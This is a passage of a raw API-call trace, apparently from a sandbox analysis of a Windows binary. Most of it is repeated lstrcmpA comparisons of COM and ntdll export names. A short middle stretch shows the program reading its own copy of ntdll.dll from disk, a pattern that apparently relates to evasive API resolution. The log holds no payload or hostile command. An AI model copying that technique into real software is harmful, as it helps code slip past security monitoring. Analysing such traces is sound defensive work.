(lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0094.712] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0094.712] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0094.713] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0094.713] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0094.714] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0094.714] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.715] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0094.961] GetProcessHeap () returned 0x430000 [0094.961] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4116040 | out: hHeap=0x430000) returned 1 [0094.967] GetProcessHeap () returned 0x430000 [0094.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449080 [0094.967] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0094.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0094.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0094.968] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0094.968] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0094.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0094.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0094.968] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0094.968] GetProcessHeap () returned 0x430000 [0094.968] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bba48) returned 0x411e040 [0094.972] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0094.972] ReadFile (in: hFile=0x140, lpBuffer=0x411e040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411e040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0094.988] CloseHandle (hObject=0x140) returned 1 [0094.988] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0094.988] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0094.988] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0094.988] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0094.988] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0094.988] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0094.988] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0094.988] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0094.988] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0094.988] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0094.988] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0094.988] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0094.988] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0094.988] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.988] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0094.988] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0094.988] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0094.988] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0094.988] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.988] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.989] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.990] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.990] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0094.990] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.991] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0094.991] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0094.992] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", 